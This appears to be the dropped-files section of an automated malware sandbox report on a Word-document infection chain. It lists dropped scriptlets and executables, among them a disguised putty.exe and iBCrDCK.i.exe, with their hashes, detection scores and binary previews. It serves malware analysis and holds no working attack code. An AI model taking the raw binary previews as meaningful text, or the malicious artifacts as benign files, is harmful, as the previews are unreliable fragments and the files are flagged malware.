                                SSDEEP:384:3ymxaIgzzacasapa2hoygn1VYdNl6UnRJbtqEEE6oEaE3/nh:3ymxaPzacasapa2vgnrYdNl6Un7ZFPWb
                                MD5:EAF98295C742E17B01760B98BDB04235
                                SHA1:E729C9F20DCF8AC722517FCADD4D87BEDE21F49E
                                SHA-256:4F4EAAF614069BBFC3977DB75BD69A32A4BA95E5AD1A8B28348E4051A16D10A6
                                SHA-512:E2BDF0C22670A538D38A8AD8C0AA9DF59B253BDF3C49CA4724650382F490642C99134024F13AAD64B02D5EDC42B6A4759D10156ABE1E9274DC977C2270C57E48
                                Malicious:true
                                Reputation:unknown
                                Preview: ..<scriptleT.. >.. .......................... .............. ................. ........ ................. ...... ..............'... .............. ........... ........... ................... ...... ........ ........... ............ ...... .................... ........... ............ ...... ............'... ............................ ...... ........ ........... ................. ...... ........... ........ ...................... .................... ......... ......................... ..
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT:Zone.Identifier
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27
                                Entropy (8bit):3.9582291686698787
                                Encrypted:false
                                SSDEEP:3:gAWY3W:qY3W
                                MD5:833C0EFD3064048FD6A71565CA115CCD
                                SHA1:0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
                                SHA-256:4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
                                SHA-512:536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
                                Malicious:false
                                Reputation:unknown
                                Preview: [ZoneTransfer]..ZoneId=3..3
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                                MD5:0FBED11864C03FDED0E70014DCF84578
                                SHA1:453723D938A03252F705B0A104986FE4C5CA7056
                                SHA-256:70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
                                SHA-512:DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
                                Malicious:false
                                Reputation:unknown
                                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:International EBCDIC text, with no line terminators, with overstriking
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:fw8:L
                                MD5:D3A8D9A8FD8375694BCBA2EC51445C4C
                                SHA1:A03346DBB4462D95874BDDCAD43170DCEEEF6D43
                                SHA-256:70665DB3A770558DC9DABFA25D640E9FF4692BA75CCF7975C726786ACA624582
                                SHA-512:EE6A992578524486D72CBCBF2240C3A0FE32A1C4AD72736B7834E22741A223BBF233BAECFF2A0460A6D60E9ED7023F25D62650257E2121ECC4AF34D0C7ADA628
                                Malicious:true
                                Reputation:unknown
                                Preview: ...o.U.H
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                Malicious:false
                                Reputation:unknown
                                Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NEW PO1100372954 -.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Mon Aug 2 16:59:36 2021, length=234750, window=hide
                                Category:dropped
                                Size (bytes):2108
                                Entropy (8bit):4.563563676778922
                                Encrypted:false
                                SSDEEP:48:8it+/XT0jFx1aCZwfY2it+/XT0jFx1aCZwfc:8it+/XojFHDwfY2it+/XojFHDwfc
                                MD5:63DA06EC5F4B14A27137DD323B31070F
                                SHA1:CC221AF186196FB5381FCFEB99E975DAC5666D43
                                SHA-256:9E42FBE9B5CFF3DD2749ABC139522936D6BCB28E5FB70D919750E51F80768895
                                SHA-512:D8DB266A0FA3B50F475FE5FA5463751147B3F74BD2BA91CEE3CDEEB23B434CE8BCCC8089CCB4718A3C57CD433D73D329B104CAF3B454159F3BF3EDA4796BCC96
                                Malicious:false
                                Reputation:unknown
                                Preview: L..................F.... ...-....{..-....{.....'................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......Ss. .NEWPO1~1.DOC..Z.......Q.y.Q.y*...8.....................N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\NEW PO1100372954 -.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.E.W. .P.O.1.1.0.0.3.7.2.9.5.4. .-...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):92
                                Entropy (8bit):4.571374526629979
                                Encrypted:false
                                SSDEEP:3:M1LSUPkcQjOru4oziUPkcQjOru4omX1LSUPkcQjOru4ov:MVnP66ru443P66ru4DnP66ru4y
                                MD5:0865393879B83EFC01FD7C549E71A9A5
                                SHA1:899AE6A283B9B9F0F62475C18E135B09397ED727
                                SHA-256:967255627D9D9D210D5279B8DAFF2975BE25A21A3E7E1E756896AEEF41B4751C
                                SHA-512:E8FA619372F9FDCF50114BF8C42C56163ECA7E325BFF8C72F9E1685D79E70FEF45A7270420576110EB1C382D70A2B1EB8F44A788451A852B0F5BCBD5F7D628CE
                                Malicious:false
                                Reputation:unknown
                                Preview: [doc]..NEW PO1100372954 -.LNK=0..NEW PO1100372954 -.LNK=0..[doc]..NEW PO1100372954 -.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:Qn:Qn
                                MD5:F3B25701FE362EC84616A93A45CE9998
                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                Malicious:false
                                Reputation:unknown
                                Preview: ..
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\490281AC8GSCNCH37UYE.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LOCAUF6YJEF7K6W8Y37G.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RA5AG9965KYDVANTRM0T.temp
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8016
                                Entropy (8bit):3.5836145728363404
                                Encrypted:false
                                SSDEEP:96:chQCAMqoqvsqvJCwo+z8hQCAMqoqvsEHyqvJCworQz2QYVHtyByCHFlUVUIu:cGho+z8G5HnorQz2rurH9Iu
                                MD5:BF6DEE5BCCB0B3116AFC11A073DF62BB
                                SHA1:8E65F7FF14D5E4407C32BA959CE795D072AD826E
                                SHA-256:3D61A8493060F9D327B5C392075EB14240C046DC6D9B89C6370FF18F017060F4
                                SHA-512:30F1CE1F899D17E99BDCE356D78C138BA6C8A7CDCDB6E64723A57B7E8DBBFF09E666BAB8D0D9F6F912B108F79EF27AB5BE5907806A90960EFE5204B933486E14
                                Malicious:false
                                Reputation:unknown
                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Roaming\putty.exe
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Roaming\zbEIIaj.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.7798653713156546
                                Encrypted:false
                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                Malicious:false
                                Reputation:unknown
                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\zzoj.CG.tmp
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):35549
                                Entropy (8bit):6.06431092799383
                                Encrypted:false
                                SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                Malicious:false
                                Reputation:unknown
